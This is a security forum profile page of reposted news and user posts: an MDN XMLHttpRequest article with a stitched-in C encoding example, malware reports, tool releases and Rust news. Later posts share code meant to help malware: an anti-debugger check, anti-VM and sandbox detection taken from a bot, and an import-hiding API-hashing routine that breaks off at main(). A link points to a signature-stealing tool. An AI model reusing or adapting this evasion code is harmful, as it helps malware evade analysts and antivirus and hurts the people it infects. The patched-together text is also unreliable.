Everything posted by Nytro
-
[h=1]HTML in XMLHttpRequest[/h]

The W3C XMLHttpRequest specification adds HTML parsing support to XMLHttpRequest, which originally supported only XML parsing. This feature allows Web apps to obtain an HTML resource as a parsed DOM using XMLHttpRequest.

[h=3]Limitations[/h]

To discourage the synchronous use of XMLHttpRequest, HTML support is not available in the synchronous mode. Also, HTML support is only available if the responseType property has been set to "document". This limitation avoids wasting time parsing HTML uselessly when legacy code uses XMLHttpRequest in the default mode to retrieve responseText for text/html resources. Also, this limitation avoids problems with legacy code that assumes that responseXML is null for HTTP error pages (which often have a text/html response body).

[h=3]Usage[/h]

Retrieving an HTML resource as a DOM using XMLHttpRequest works just like retrieving an XML resource as a DOM using XMLHttpRequest, except you can't use the synchronous mode and you have to explicitly request a document by assigning the string "document" to the responseType property of the XMLHttpRequest object after calling open() but before calling send().

    var xhr = new XMLHttpRequest();
    xhr.onload = function() {
        alert(this.responseXML.title);
    }
    xhr.open("GET", "file.html");
    xhr.responseType = "document";
    xhr.send();

[h=3]Feature Detection[/h]

There are two challenges to detecting if a browser supports HTML parsing in XMLHttpRequest. First, the detection result is obtained asynchronously, because HTML support is only available in the asynchronous mode. Second, you have to actually fetch a test document over HTTP, because testing with a data: URL would end up testing data: URL support instead. Thus, to detect HTML support, a test HTML file is needed on the server.

This test file is small and is not well-formed XML:

    <title>&&<</title>

If the file is named detect.html, the following function can be used for detecting HTML parsing support:

    function detectHtmlInXhr(callback) {
        if (!window.XMLHttpRequest) {
            window.setTimeout(function() { callback(false); }, 0);
            return;
        }
        var done = false;
        var xhr = new window.XMLHttpRequest();
        xhr.onreadystatechange = function() {
            if (this.readyState == 4 && !done) {
                done = true;
                callback(!!(this.responseXML && this.responseXML.title && this.responseXML.title == "&&<"));
            }
        }
        xhr.onabort = xhr.onerror = function() {
            if (!done) {
                done = true;
                callback(false);
            }
        }
        try {
            xhr.open("GET", "detect.html");
            xhr.responseType = "document";
            xhr.send();
        } catch (e) {
            window.setTimeout(function() {
                if (!done) {
                    done = true;
                    callback(false);
                }
            }, 0);
        }
    }

The argument callback is a function that will be called asynchronously with true as the only argument if HTML parsing is supported and false as the only argument if HTML parsing is not supported.

[h=3]Character Encoding[/h]

If the character encoding is declared in the HTTP Content-Type header, that character encoding is used. Failing that, if there is a byte order mark, the encoding indicated by the byte order mark is used. Failing that, if there is a meta tag that declares the encoding within the first 1024 bytes of the file, that encoding is used. Otherwise, the file is decoded as UTF-8.

Source: https://developer.mozilla.org/en/HTML_in_XMLHttpRequest
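The four-step encoding decision in the Character Encoding section, written out as an added C example (mine, not code from the MDN article or from any browser): charset parameter of Content-Type, then BOM, then a <meta> charset inside the first 1024 bytes, then UTF-8. The meta scan is a simplified substring search rather than the full HTML prescan algorithm, and the sample responses in detect_demo() are constructed for this example.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Case-insensitive search for needle inside the first n bytes of hay. */
static const char *find_ci(const char *hay, size_t n, const char *needle) {
    size_t m = strlen(needle);
    for (size_t i = 0; i + m <= n; i++) {
        size_t j = 0;
        while (j < m && tolower((unsigned char)hay[i + j]) == tolower((unsigned char)needle[j])) j++;
        if (j == m) return hay + i;
    }
    return NULL;
}

/* Copy the charset token starting at p (skipping spaces/quotes), lowercased, into out. */
static int copy_token(const char *p, const char *end, char *out, size_t outlen) {
    size_t k = 0;
    while (p < end && (*p == ' ' || *p == '"' || *p == '\'')) p++;
    while (p < end && k + 1 < outlen &&
           (isalnum((unsigned char)*p) || *p == '-' || *p == '_' || *p == '.')) {
        out[k++] = (char)tolower((unsigned char)*p);
        p++;
    }
    out[k] = '\0';
    return k > 0;
}

/* Step 1: charset parameter of the HTTP Content-Type header. */
static int charset_from_header(const char *content_type, char *out, size_t outlen) {
    if (!content_type) return 0;
    size_t n = strlen(content_type);
    const char *p = find_ci(content_type, n, "charset=");
    return p ? copy_token(p + 8, content_type + n, out, outlen) : 0;
}

/* Step 2: byte order mark at the start of the body. */
static int charset_from_bom(const unsigned char *b, size_t n, char *out, size_t outlen) {
    if (n >= 3 && b[0] == 0xEF && b[1] == 0xBB && b[2] == 0xBF) { snprintf(out, outlen, "utf-8"); return 1; }
    if (n >= 2 && b[0] == 0xFE && b[1] == 0xFF) { snprintf(out, outlen, "utf-16be"); return 1; }
    if (n >= 2 && b[0] == 0xFF && b[1] == 0xFE) { snprintf(out, outlen, "utf-16le"); return 1; }
    return 0;
}

/* Step 3: a <meta ... charset=...> declaration, but only within the first 1024 bytes. */
static int charset_from_meta(const unsigned char *b, size_t n, char *out, size_t outlen) {
    size_t limit = n < 1024 ? n : 1024;
    const char *s = (const char *)b;
    const char *meta = find_ci(s, limit, "<meta");
    while (meta) {
        size_t rest = limit - (size_t)(meta - s);
        const char *close = memchr(meta, '>', rest);
        size_t taglen = close ? (size_t)(close - meta) : rest;
        const char *cs = find_ci(meta, taglen, "charset=");
        if (cs) return copy_token(cs + 8, meta + taglen, out, outlen);
        meta = find_ci(meta + 5, rest - 5, "<meta");
    }
    return 0;
}

/* The decision order from the article; step 4 is the UTF-8 fallback. Returns out. */
const char *resolve_html_encoding(const char *content_type, const unsigned char *body, size_t n,
                                  char *out, size_t outlen) {
    if (charset_from_header(content_type, out, outlen)) return out;
    if (charset_from_bom(body, n, out, outlen)) return out;
    if (charset_from_meta(body, n, out, outlen)) return out;
    snprintf(out, outlen, "utf-8");
    return out;
}

/* Constructed sample responses (not from the article) exercising each step. */
static const char SAMPLE_PLAIN[] = "<title>&&<</title>";
static const char SAMPLE_BOM[] = "\xEF\xBB\xBF<title>x</title>";
static const char SAMPLE_META[] =
    "<html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1250\"></head>";
static char g_out[32];

const char *detect_demo(int which) {
    switch (which) {
    case 0: /* header wins over everything in the body */
        return resolve_html_encoding("text/html; charset=ISO-8859-2", (const unsigned char *)SAMPLE_PLAIN,
                                     sizeof SAMPLE_PLAIN - 1, g_out, sizeof g_out);
    case 1: /* no header charset, UTF-8 BOM */
        return resolve_html_encoding("text/html", (const unsigned char *)SAMPLE_BOM,
                                     sizeof SAMPLE_BOM - 1, g_out, sizeof g_out);
    case 2: /* no header charset, no BOM, meta declaration */
        return resolve_html_encoding("text/html", (const unsigned char *)SAMPLE_META,
                                     sizeof SAMPLE_META - 1, g_out, sizeof g_out);
    case 3: { /* meta past the 1024-byte window is ignored, so UTF-8 applies */
        static unsigned char late[1024 + 64];
        memset(late, ' ', 1024);
        memcpy(late + 1024, "<meta charset=\"koi8-r\">", 23);
        return resolve_html_encoding("text/html", late, 1024 + 23, g_out, sizeof g_out);
    }
    default:
        return resolve_html_encoding("text/html", (const unsigned char *)SAMPLE_PLAIN,
                                     sizeof SAMPLE_PLAIN - 1, g_out, sizeof g_out);
    }
}
```

Case 3 is the one worth remembering: a charset declared after the first kilobyte does not count, so a response that relies on a late <meta> is decoded as UTF-8 whatever the page intended.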
-
UniOFuzz 0.1.2-beta - Universal fuzzing tool Released

UniOFuzz version 0.1.2-beta - the universal fuzzing tool for browsers, web services, files, programs and network services/ports - released by nullsecurity team.

Video: pigtail23, developer of UniOFuzz, demonstrates the tool in the video above.

Download UniOFuzz

Source: UniOFuzz 0.1.2-beta - Universal fuzzing tool Released | The Hacker News (THN)
-
[h=1]Virus infects worm by mistake[/h]

24 January 2012

New malware morphs into different shapes unattended by humans

Ten years ago, there was a clear-cut distinction between Trojans, viruses and worms. They all had their own features specific to one family of malware only. As more people connected to the internet, cyber-criminals started mixing ingredients to maximize impact. And here I’m thinking Trojans with worm capabilities or viruses with Trojan features, and so on. Now, another “practice” has silently emerged: the file infector that accidentally parasites another e-threat.

A virus infects executable files; and a worm is an executable file. If the virus reaches a PC already compromised by a worm, the virus will infect the exe files on that PC - including the worm. When the worm spreads, it will carry the virus with it. Although this happens unintentionally, the combined features from both pieces of malware will inflict a lot more damage than the creators of either piece of malware intended.

While most file infectors have inbuilt spreading mechanisms, just like Trojans and worms (spreading routines for RDP, USB, P2P, chat applications, or social networks), some cannot replicate or spread between computers. And it seems a great idea to “outsource” the transportation mechanism to a different piece of malware (i.e. by piggybacking a worm). Most likely these Frankenmalware, or “malware sandwiches,” take place spontaneously. The virus actually infects by mistake another piece of malware and ends up using its capabilities to spread.

Bitdefender’s Antimalware Lab identified no less than 40,000 such malware symbioses out of a sample pool of 10 million files. One such case is the Virtob file infector, whose malicious code has been found infecting worms like OnlineGames, the ancient Mydoom or the more advanced Bifrose backdoor Trojan. From the numerous samples of worms infected by viruses, we picked out the Win32.Worm.Rimecud - Win32.Virtob pair.

[h=3]A few words about Win32.Worm.Rimecud[/h]

Win32.Worm.Rimecud is your typical worm with a state-of-the-art spreading apparatus. For propagation it uses file-sharing applications (Ares P2P, BearShare, iMesh, Shareaza, Kazaa, DC++, eMule, LimeWire), USB devices, Microsoft MSN Messenger (sends all contacts links to sites that host malware) and network drives mapped locally. Once on the system, Rimecud injects its code into explorer.exe and steals passwords pertaining to e-banking, on-line shopping, social networking or e-mail accounts from Mozilla Firefox and Internet Explorer. In the meantime its backdoor component enables it to connect to the C&C servers and fetch commands such as flood, download and execute further malware on the compromised PC. On top of that, the worm looks for a VNC server (remote control software) that would allow the attacker remote access and control of the compromised PC.

[h=3]And certain details about Win32.Virtob[/h]

Bitdefender labs have recently seen a file infector, Win32.Virtob, attached to the above mentioned worm. This virus is known to infect executable files with .exe or .scr extensions by affixing a piece of malicious code to those files. The worm is an executable file, so chances are it also gets infected by the virus if it’s on the same computer. Virtob then instructs the compromised executable files to firstly run the viral code (by changing the entry point) and only afterwards gives control back to the original file. Certainly this also applies to the worm - its code will be executed only after the virus code has been launched. When its code is successfully loaded into the memory, Virtob connects to two IRC servers that are in fact C&C servers, and with the help of its backdoor component, the virus is ready to receive commands from a remote attacker via the Internet.

By injecting its code into winlogon.exe and then adding this process to the firewall exception list, the virus makes sure it is granted complete Internet access and ensures its persistence – Winlogon is a critical process that, if terminated, will crash the computer. Afterwards, it infects HTML, HTM, PHP, ASP files by injecting IFrames that might silently load content from malware-laden pages.

Now, imagine these two pieces of malware working together - willingly or not - from and on the same compromised system. That PC faces a twofold malware with twice as many command and control servers to query for instructions; moreover, there are two backdoors open, two attack techniques active and various spreading methods put in place. Where one fails, the other succeeds.

[h=3]Multiple Frankenware infections possible[/h]

If, by utter bad luck, the computer has more than one worm that matches the virus's infection criteria, the virus could infect more than one worm on the system. However, the virus might as well only infect the executable files in certain system locations, or of a certain length. Other viruses look for certain strings that pertain to other pieces of malware, which will remain uninfected if found on the compromised system. So, one worm can be infected while others on the same system are not.

If one of the two (whether the virus or the worm) is caught by the AV, the other might pass undetected. Perhaps if we think of an infected file (possibly the virus) that needs to be analyzed separately and a piece of code is taken out and looked at, maybe then someone also discovers the worm. If the worm is detected based on a signature, the worm is simply wiped out from the compromised system, without any further analysis. This would make it easier for the virus to pass unseen. There’s no rule.

And two hypothetical scenarios:

Hypothetical scenario No. 1: Imagine a worm like Downadup, which has been spreading constantly around the world for three years now (70,000 infected systems in the last six months alone), being infected with a virus. On the one hand, Downadup prevents the system from updating the OS and the AV solution locally installed; and on the other hand the virus may have rootkit capabilities and open a backdoor. Downadup spreads around the world constantly, which makes it a great propagation tool; not to mention that it took AVs more than half a year, and almost a million infections, to discover it. If this had carried along a virus, all those users would have suffered greater damage. And disinfection would be more complicated.

Hypothetical scenario No. 2: Imagine that a worm is infected by a file infector (virus). And an AV detects the file infector first and tries to disinfect the files, which include the worm. In some rare cases disinfecting compromised files leaves behind clean files that are at the same time altered (not identical to the original anymore). They maintain their functionality but are slightly different in form. As most files are detected according to signatures and not based on their behavior (heuristically), an altered worm (disinfected along with other files that have been compromised by a file infector and disinfected by an antivirus) may not be caught anymore by the signature applied to the original file (which has been modified by the disinfection). Disinfection might this way lead to a mutation that can actually help the worm.

This article is based on the technical information provided courtesy of Doina Cosovan & Răzvan Benchea, Bitdefender Virus Analysts. All product and company names mentioned herein are for identification purposes only and are the property of, and may be trademarks of, their respective owners.

Source: Virus infects worm by mistake - MalwareCity : Computer Security Blog
-
[h=1]Android.Counterclank Found in Official Android Market[/h]

by Irfan Asrar

Symantec has identified multiple publisher IDs on the Android Market that are being used to push out Android.Counterclank. This is a minor modification of Android.Tonclank, a bot-like threat that can receive commands to carry out certain actions, as well as steal information from the device.

For each of these malicious applications, the malicious code has been grafted on to the main application in a package called “apperhand”. When the package is executed, a service with the same name may be seen running on a compromised device. Another sign of an infection is the presence of the Search icon above on the home screen.

The combined download figures of all the malicious apps indicate that Android.Counterclank has the highest distribution of any malware identified so far this year.

Publisher | Malicious App Title | Category
iApps7 Inc | Counter Elite Force | Arcade & Action
iApps7 Inc | Counter Strike Ground Force | Arcade & Action
iApps7 Inc | CounterStrike Hit Enemy | Arcade & Action
iApps7 Inc | Heart Live Wallpaper | Entertainment
iApps7 Inc | Hit Counter Terrorist | Arcade & Action
iApps7 Inc | Stripper Touch girl | Entertainment
Ogre Games | Balloon Game | Sports Games
Ogre Games | Deal & Be Millionaire | Sports Games
Ogre Games | Wild Man | Arcade & Action
redmicapps | Pretty women lingerie puzzle | Photography
redmicapps | Sexy Girls Photo Game | Lifestyle
redmicapps | Sexy Girls Puzzle | Brain & Puzzle
redmicapps | Sexy Women Puzzle | Brain & Puzzle

Symantec is continuing with further investigation and we will post more information as we discover it.

Source: Android.Counterclank Found in Official Android Market | Communauté Symantec Connect
-
Acunetix Web Vulnerability Scanner

By MaxiSoler on 28 January 2012 in Tools with No Comments

Acunetix Web Vulnerability Scanner (WVS) is an automated web application security testing tool that audits your web applications by checking for exploitable hacking vulnerabilities. Automated scans may be supplemented and cross-checked with the variety of manual tools to allow for comprehensive web site and web application penetration testing.

Improvements:
- The accuracy of Script Checks has been increased. The Acunetix development team is dedicated to continuously improving scan detection of security checks.
- The Graphical User Interface (GUI) has been enhanced in order to make menu navigation and usage easier and more effective than ever before.
- The SSL security audit script is launched automatically when scanning an HTTPS website, regardless of whether port scanning is enabled or not.
- Added a number of new SQL Injection variant checks.

Bug Fixes:
- HPP detection security script failed when testing input scheme with excluded variants
- Apply settings button not showing up in specific cases
- Fixed several issues related to pausing and resuming of the crawler
- Fixed several issues when running multiple instances of the reporter
- Two backup files were being generated because of filename case insensitivity
- Filtering of wildcards from robots.txt

This release candidate of Acunetix Web Vulnerability Scanner Version 8 is considered complete, stable, and suitable for testing.

More Information: Acunetix v8 Manual
Download Acunetix Web Vulnerability Scanner v8 RC

Source: IT Vulnerability & ToolsWatch | Acunetix Web Vulnerability Scanner v8 Released Candidate Released
-
[h=2]Mozilla releases Rust 0.1, the language that will eventually usurp Firefox’s C++[/h]

By Sebastian Anthony on January 24, 2012 at 6:52 am

After more than five years in the pipeline, Mozilla Labs and the Rust community have released the first alpha — version 0.1 — of the Rust programming language compiler. The Rust language emphasizes concurrency and memory safety, and — if everything goes to plan — is ultimately being groomed to replace C++ as Mozilla’s compiled language of choice. Browser prototypes programmed in Rust will eventually emerge, and then one day Firefox — or parts of Firefox — might be re-written in Rust.

A bit more about the language itself: Rust is a compiled, statically-typed, object-oriented programming language (and objects are immutable by default). The compiler is supported on Windows, Linux, and Mac. Feature-wise, Rust intentionally avoids any novel ideas, and instead builds upon existing, known features that are present in other languages. Syntax-wise, Rust uses curly braces {} like C, C++, or JavaScript, but as you can see in the code block below, the syntax is actually quite funky.

[INDENT]
use std;
fn main(args: [str]) {
    std::io::println("hello world from '" + args[0] + "'!");
}
[/INDENT]

At this point we have to compare Rust to Go, Google’s new language. The Rust community explicitly says that it was not inspired by Go — development of Rust began before Go — but that other languages made by Rob Pike such as Newsqueak, Alef, and Limbo were influential. Feature-wise, the languages are quite similar, but Rust seems to be more security- and safety-oriented. Where Go has global garbage collection, null pointers, and shared mutable states, Rust GC is optional and per-task, null pointers are not allowed, and objects are immutable by default.

As far as the state of the language is concerned, most of its features work but are incomplete. Standard library APIs are subject to change. Performance isn’t yet up to scratch (eventually it should be as fast as C++). In other words, you can dive in and play with Rust, but future versions of the compiler will break your code. To get started, hit up the Rust language website — or read the Rust 0.1 release notes.

Source: Mozilla releases Rust 0.1, the language that will eventually usurp Firefox’s C++ | ExtremeTech
-
MediaFire: "We are an American company and we respect American laws." (something like that) They will continue to offer hosting services.
-
Get to work, don't hold your hand out. No such crap here, or you'll stay thieves your whole life. I hope you rot in prison. Permanent ban.
-
28C3: How governments have tried to block Tor (en)
Nytro replied to Nytro's topic in Tutoriale video
Ah, I knew it had been posted before, but I thought it was the German-language version, which is why I posted it. -
Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit
Nytro replied to The_Arhitect's topic in Exploituri
See this: [h=1]Linux Local Privilege Escalation via SUID /proc/pid/mem Write[/h] -
Along the same lines:

[h=2]Anti-Debug trick[/h]

defs.h

    NTSYSAPI NTSTATUS NTAPI NtCreateEventPair(
        OUT PHANDLE EventPairHandle,
        IN ACCESS_MASK DesiredAccess,
        IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL
    );

    // DBGKM_MSG is declared before DEBUG_EVENT so that DEBUG_EVENT can embed it.
    typedef struct _DBGKM_MSG {
        PORT_MESSAGE h;
        DBGKM_APINUMBER ApiNumber;
        ULONG ReturnedStatus;
        union {
            DBGKM_EXCEPTION Exception;
            DBGKM_CREATE_THREAD CreateThread;
            DBGKM_CREATE_PROCESS CreateProcess;
            DBGKM_EXIT_THREAD ExitThread;
            DBGKM_EXIT_PROCESS ExitProcess;
            DBGKM_LOAD_DLL LoadDll;
            DBGKM_UNLOAD_DLL UnloadDll;
        };
    } DBGKM_MSG, *PDBGKM_MSG;

    typedef struct _DEBUG_EVENT {
        LIST_ENTRY EventList;
        KEVENT ContinueEvent;
        CLIENT_ID ClientId;
        PEPROCESS Process;
        PETHREAD Thread;
        NTSTATUS Status;
        ULONG Flags;
        PETHREAD BackoutThread;
        DBGKM_MSG ApiMsg;
    } DEBUG_EVENT, *PDEBUG_EVENT;

    // The following declarations are used by detect.c but were not part of the
    // defs.h excerpt in the post; they are added here from the undocumented native
    // API (assumed layout, check against your own SDK/ntdll headers).
    typedef struct _DEBUG_BUFFER {
        HANDLE SectionHandle;
        PVOID SectionBase;
        PVOID RemoteSectionBase;
        ULONG SectionBaseDelta;
        HANDLE EventPairHandle;
        ULONG Unknown[2];
        HANDLE RemoteThreadHandle;
        ULONG InfoClassMask;
        ULONG SizeOfInfo;
        ULONG AllocatedSize;
        ULONG SectionSize;
        PVOID ModuleInformation;
        PVOID BackTraceInformation;
        PVOID HeapInformation;
        PVOID LockInformation;
        PVOID Reserved[8];
    } DEBUG_BUFFER, *PDEBUG_BUFFER;

    NTSYSAPI PDEBUG_BUFFER NTAPI RtlCreateQueryDebugBuffer(IN ULONG Size, IN BOOLEAN EventPair);
    NTSYSAPI NTSTATUS NTAPI RtlQueryProcessHeapInformation(IN OUT PDEBUG_BUFFER Buffer);

detect.c

    #define WIN32_LEAN_AND_MEAN
    #include <stdio.h>
    #include <stdlib.h>
    #include <windows.h>
    #include "defs.h"
    #pragma comment(lib,"ntdll.lib")
    #pragma comment(lib,"psapi.lib")

    // Compares fields of the process debug buffer against fixed values the post
    // associates with a debugger being attached.
    void QueryProcessHeapMethod(void)
    {
        PDEBUG_BUFFER buffer;
        buffer = RtlCreateQueryDebugBuffer(0,FALSE);
        if (!buffer)
            return;
        RtlQueryProcessHeapInformation(buffer);
        if (buffer->RemoteSectionBase == (PVOID) 0x50000062)
            MessageBoxA(NULL,"Debugged","Warning",MB_OK);
        else
            MessageBoxA(NULL,"Not Debugged","Warning",MB_OK);
        if (buffer->EventPairHandle == (PVOID) 0x00002b98)
            MessageBoxA(NULL,"Debugged","Warning",MB_OK);
        else
            MessageBoxA(NULL,"Not Debugged","Warning",MB_OK);
        printf("EventPairHandle= %x",(int)buffer->EventPairHandle);
    }

    int main()
    {
        QueryProcessHeapMethod();
        return 0;
    }

Source (with other useful information): Anti-Debug trick
-
Finally someone who posts extremely useful and interesting things. For those interested, of course.
-
[h=1][C#] Digitally Sign App & Steal Signature[/h]

This is a quick draft of stealing a signature from a signed app, and signing your own app w/ the signature.

Author: Exidous

Download (x86 and x64):
http://www.hackhound.org/forum/index.php?app=core&module=attach&section=attach&attach_id=12100
http://www.hackhound.org/forum/index.php?app=core&module=attach&section=attach&attach_id=12110

Make yourselves an account too: http://www.hackhound.org/forum/topic/42544-c-digitally-sign-app-steal-signature/
-
[h=1][C++] Anti-VMWare[/h]

Author: _Carb0n_

    #include "../Headers/includes.h"
    #include "../Headers/functions.h"

    #ifndef NO_ANTIVM

    // Exception filter: reached only when the VPC backdoor opcodes raise an illegal
    // instruction, i.e. when Virtual PC is NOT running.
    DWORD __forceinline IsInsideVPC_exceptionFilter(LPEXCEPTION_POINTERS ep)
    {
        PCONTEXT ctx = ep->ContextRecord;
        ctx->Ebx = -1; // Not running VPC
        ctx->Eip += 4; // skip past the "call VPC" opcodes
        return EXCEPTION_CONTINUE_EXECUTION;
    }

    bool DetectVPC()
    {
        bool bVPCIsPresent = FALSE;
        __try
        {
            _asm push ebx
            _asm mov ebx, 0 // It will stay ZERO if VPC is running
            _asm mov eax, 1 // VPC function number
            _asm __emit 0Fh
            _asm __emit 3Fh
            _asm __emit 07h
            _asm __emit 0Bh
            _asm test ebx, ebx
            _asm setz [bVPCIsPresent]
            _asm pop ebx
        }
        __except(IsInsideVPC_exceptionFilter(GetExceptionInformation()))
        {
        }
    #ifdef DEBUG
        if (bVPCIsPresent==TRUE)
            DebugMsg("Bot is under VPC !");
        else
            DebugMsg("Bot is not running under VPC !");
    #endif
        return bVPCIsPresent;
    }

    bool DetectVMWare()
    {
        bool bVMWareIsPresent = TRUE;
        __try
        {
            __asm
            {
                push edx
                push ecx
                push ebx
                mov eax, 'VMXh'
                mov ebx, 0 // any value but not the MAGIC VALUE
                mov ecx, 10 // get VMWare version
                mov edx, 'VX' // port number
                in eax, dx // read port
                // on return EAX returns the VERSION
                cmp ebx, 'VMXh' // is it a reply from VMWare?
                setz [bVMWareIsPresent] // set return value
                pop ebx
                pop ecx
                pop edx
            }
        }
        __except(EXCEPTION_EXECUTE_HANDLER)
        {
            // outside VMware the IN instruction faults and we land here
            bVMWareIsPresent = FALSE;
        }
    #ifdef DEBUG
        if (bVMWareIsPresent==TRUE)
            DebugMsg("Bot is under VMWare !");
        else
            DebugMsg("Bot is not running under VMWare !");
    #endif
        return bVMWareIsPresent;
    }

    bool DetectAnubis()
    {
        char szBotFile[MAX_PATH];
        bool bAnubisIsPresent = FALSE;
        // The posted version never filled szBotFile; the module path is fetched here
        // so that strstr() has a real string to search. The backslash in the Anubis
        // path was dropped by the forum's copy and is restored.
        GetModuleFileNameA(NULL, szBotFile, MAX_PATH);
        if (strstr(szBotFile, "C:\\InsideTm"))
            bAnubisIsPresent = TRUE;
    #ifdef DEBUG
        if (bAnubisIsPresent==TRUE)
            DebugMsg("Bot is running under Anubis !");
        else
            DebugMsg("Bot is not running under Anubis !");
    #endif
        return bAnubisIsPresent;
    }

    bool IsProcessRunningUnderVM()
    {
        bool bVMWare;
        bool bVPC;
        bool bAnubis;
        bVMWare = DetectVMWare();
        bVPC = DetectVPC();
        bAnubis = DetectAnubis();
        if (bVPC==TRUE || bVMWare==TRUE || bAnubis==TRUE)
            return TRUE;
        return FALSE;
    }

    #endif

Source: http://www.hackhound.org/forum/topic/893-c-anti-vmware/
-
[C] Dynamic API calling

Author:

    /*
    Calling Windows API without using any API.
    32bit version. Tested on Win7 x64.
    by January, 2012.

    This is how I've been doing my API calling for years. I believe I first started doing it with the Ju u stealer.
    Using an array of function pointers and an array of hashes for each library, I find it much easier to gather all of the
    necessary API pointers than doing 1 function call for each API I want to use. Or doing a function call every time I want
    to use an API.

    get_k32base() has been changed from what it used to be because I found it was no longer working on my win7.
    I do not guarantee it's effectiveness on other OS's.

    #trinity OG production. Fuck your crew.
    */

    #include <windows.h>

    //I didn't have the header for these two structs so that's why they're here...
    typedef struct _UNICODE_STRING {
        USHORT Length;
        USHORT MaximumLength;
        PWSTR Buffer;
    } UNICODE_STRING, *PUNICODE_STRING;

    typedef struct _LDR_MODULE {
        LIST_ENTRY InLoadOrderModuleList;
        LIST_ENTRY InMemoryOrderModuleList;
        LIST_ENTRY InInitializationOrderModuleList;
        PVOID BaseAddress;
        PVOID EntryPoint;
        ULONG SizeOfImage;
        UNICODE_STRING FullDllName;
        UNICODE_STRING BaseDllName;
        ULONG Flags;
        SHORT LoadCount;
        SHORT TlsIndex;
        LIST_ENTRY HashTableEntry;
        ULONG TimeDateStamp;
    } LDR_MODULE, *PLDR_MODULE;

    //definitions for API we are importing.
    typedef HMODULE (WINAPI *LoadLibraryW_)(LPCWSTR lpLibFileName);
    typedef int (WINAPI *MessageBoxW_)(HWND hWnd, LPCWSTR lpText, LPCWSTR lpCaption, UINT uType);
    typedef int (WINAPI *MessageBoxA_)(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType);

    //hashes for API we are importing.
    #define dwLoadLibraryW 0x5FBFF111
    #define dwMessageBoxW 0x384F14CA
    #define dwMessageBoxA 0x384F14B4

    //function pointers for API we are importing.
    static LoadLibraryW_ LLW;
    static MessageBoxW_ MBW;
    static MessageBoxA_ MBA;

    //Arrays for API we are importing.
    //Must have a corresponding array of hashes and addresses function pointers for each library.

    //Kernel32
    //Yes, I know it's dumb to have an array of 1 element...but that's just how the function works.
    //This could be redone so that you don't need the Kernel32Hashes array but it's in here for uniformity.
    static const DWORD Kernel32Hashes[] = { dwLoadLibraryW };
    static LPVOID* Kernel32Ptrs[] = { (LPVOID*)&LLW };

    //User32
    //MessageBoxW AND MessageBoxA?!? Yeah... I didn't have any better ideas for a simple example.
    static const DWORD User32Hashes[] = { dwMessageBoxW, dwMessageBoxA };
    static LPVOID* User32Ptrs[] = { (LPVOID*)&MBW, (LPVOID*)&MBA };

    //code..
    int _lstrcmpW_(LPCWSTR str1, LPCWSTR str2)
    /*
    lstrcmpW replacement function so that there is no unnecessary imports in the IAT.
    this doesn't behave exactly as lstrcmpW but I don't need it to I just needed it to tell if two strings are the same,
    I don't care what the numerical difference is. It would be advisable to turn this into something that compares the hash
    of the two strings but its whatevs.

    inputs: two null terminated, wide character strings.
    outputs: 0 if strings are the same, else -1.
    */
    {
        if (*str1 == 0 || *str2 == 0)
            return -1;
        while (*str1 && *str2)
        {
            if (*str1 != *str2)
                return -1;
            str1++;
            str2++;
        }
        if (*str1 || *str2)
            return -1;
        return 0;
    }

    DWORD DJBHash(LPCSTR str)
    /*
    not by me. old, simple hashing function, don't know the real author.
    modified to specifically hash null terminated ASCII strings.

    inputs: null terminated string.
    outputs: 32-bit hash of input null terminated string.
    */
    {
        DWORD hash = 5381;
        for(; *str; str++)
        {
            hash = ((hash << 5) + hash) + (*str);
        }
        return hash;
    }

    LPVOID GetAPI_FROM_DJB(const LPVOID library, const DWORD APIHASH)
    /*
    GetProcAddress replacement. Uses hashes of api names instead of strings.

    inputs:
    library = handle or base address to library (DLL) currently loaded in memory.
    APIHASH = hash of API name we are searching for.
    outputs:
    on success: pointer to library function that can be called from a function pointer.
    on error: NULL.
    */
    {
        PIMAGE_EXPORT_DIRECTORY lExport;
        DWORD x;
        if (library)
        {
            // walk DOS header -> NT headers -> export directory (DataDirectory[0])
            lExport = (PIMAGE_EXPORT_DIRECTORY)((DWORD)library +
                ((PIMAGE_NT_HEADERS)((DWORD)library + ((PIMAGE_DOS_HEADER)library)->e_lfanew))->OptionalHeader.DataDirectory[0].VirtualAddress);
            DWORD *Names = (DWORD*)((DWORD)library + lExport->AddressOfNames);
            WORD *Ordinals = (WORD*)((DWORD)library + lExport->AddressOfNameOrdinals);
            DWORD *Functions = (DWORD*)((DWORD)library + lExport->AddressOfFunctions);
            for (x = 0; x < lExport->NumberOfNames; x++)
            {
                if (DJBHash((char*)(Names[x] + (DWORD)library)) == APIHASH)
                    return (LPVOID)(Functions[Ordinals[x]] + (DWORD)library);
            }
        }
        return NULL;
    }

    LPVOID get_k32base()
    /*
    The assembly code is not mine, just modified from an old source by drn. I believe it was originally by Vecna or somebody.

    inputs: none, obviously.
    outputs: base address of kernel32.dll (if you are using windows2000 this will fail if kernel32 is not already linked in
    the import table, due to bug in win2k.)
    */
    {
        LPVOID k32base = NULL;
        PLDR_MODULE lm, lol;
        __asm
        {
            pushad
            xor eax, eax
            mov eax, fs:[eax+30h]   // PEB
            mov eax, [eax+0ch]      // PEB->Ldr
            mov esi, [eax+0ch]      // Ldr->InLoadOrderModuleList.Flink
            lodsd                   // next entry in load order
            mov [lm], eax
            popad
        }
        lol = lm;
        while (1)
        {
            if (!lm->BaseDllName.Buffer)
                break;
            if (_lstrcmpW_(L"kernel32.dll", lm->BaseDllName.Buffer) == 0)
            {
                k32base = lm->BaseAddress;
                break;
            }
            lm = (PLDR_MODULE)lm->InLoadOrderModuleList.Flink;
            if (lm == lol || !lm) //don't wanna loop infinitely if user is on win2k or some future Windows that doesn't explicitly link kernel32.
                break;
        }
        return k32base;
    }

    void fillAPIPtrs(const LPVOID DllBase, const DWORD dwNumFuncs, const DWORD *HashArray, LPVOID **PtrArray)
    /*
    Will fill an array of pointers to API from within a given library.

    inputs:
    DllBase: Base address of library we are searching.
    dwNumFuncs: Number of members in HashArray and PtrArray. Basically the number of API we are searching for in the library.
    HashArray: Array of DWORDS that are corresponding hashes for pointers to be filled in PtrArray. Must be same size as PtrArray.
    PtrArray: Array of function pointers to be filled. Must be same size as HashArray.
    outputs: none, fills PtrArray with (hopefully) valid pointers to desired API.
    */
    {
        DWORD i;
        for (i = 0; i < dwNumFuncs; i++)
            *PtrArray[i] = GetAPI_FROM_DJB(DllBase, HashArray[i]);
    }

    int main()
    {
